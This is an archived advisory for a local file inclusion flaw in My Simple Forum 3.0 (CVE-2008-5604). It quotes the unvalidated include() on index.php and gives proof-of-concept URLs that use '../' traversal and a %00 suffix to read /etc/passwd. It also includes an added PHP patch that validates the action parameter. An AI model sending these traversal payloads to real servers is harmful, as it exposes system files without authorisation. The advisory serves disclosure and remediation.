My Simple Forum 3.0 - Local File Inclusion

Author: cOndemned
type: webapps
platform: php
date_added: 2008-12-03  
date_updated: 2017-01-04  
verified: 1  
codes: OSVDB-50433;CVE-2008-5604  

raw file: 7342.txt  
/*

	$Id: mysimpleforum-3.0-lfi.txt,v 0.1 2008/12/04 23:03:00 cOndemned Exp $

	My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability
	Bug discovered by cOndemned

	Script download: http://drennansoft.com/index.php?action=download&id=1

	Greetz: ZaBeaTy, str0ke, d2, TBH, Avantura

*/


Source of index.php:

	49.	if(file_exists('site/'.$_GET['action'].'.php')) {
	50.	include('site/'.$_GET['action'].'.php');
	51.	} else {

	Local file inclusion on line 50: $_GET['action'] is concatenated into the include() path without any validation.


Proof of concept:

	http://[host]/[my_simple_forum_path]/index.php?action=../../../../../../../etc/passwd%00
	http://[host]/[my_simple_forum_path]/index.php?action=../../../../[localfile]%00
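
One way to close the include on line 50, shown as an added example that is not part of the original advisory or of My Simple Forum's code. `SITE_DIR` and `resolve_action()` are hypothetical names, and the 404 response stands in for the original `else` branch, which the excerpt does not show.

```php
<?php
// Added example, not My Simple Forum code. SITE_DIR and resolve_action()
// are hypothetical names. Requires PHP 8.0+ (mixed type).
declare(strict_types=1);

const SITE_DIR = __DIR__ . '/site';

/**
 * Map a user-supplied action to a file inside SITE_DIR,
 * or return null when it is not a plain page name.
 */
function resolve_action(mixed $action): ?string
{
    // Reject arrays (?action[]=x) and anything that is not a short identifier.
    // The character class excludes '/', '\', '.' and the NUL byte, so both the
    // "../" sequences and the %00 suffix from the proof of concept fail here.
    if (!is_string($action) || preg_match('/\A[a-z0-9_]{1,32}\z/', $action) !== 1) {
        return null;
    }

    // Defence in depth: after symlink resolution the target must exist
    // and must still sit directly under site/.
    $base = realpath(SITE_DIR);
    $path = realpath(SITE_DIR . '/' . $action . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: a plain name, the two request shapes from the
    // proof of concept, and an array. 'index' resolves only if site/index.php exists.
    foreach (['index', "../../../../etc/passwd\0", '../../x', ['a']] as $in) {
        printf("%-36s => %s\n", json_encode($in), var_export(resolve_action($in), true));
    }
} else {
    // Replacement for lines 49-51 of index.php.
    $page = resolve_action($_GET['action'] ?? null);
    if ($page !== null) {
        include $page;
    } else {
        http_response_code(404); // placeholder for the original else branch
    }
}
```

On PHP 5.3.4 and later the `%00` suffix no longer truncates include paths, but without this validation the traversal still reaches any existing `.php` file outside `site/`.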

# milw0rm.com [2008-12-04]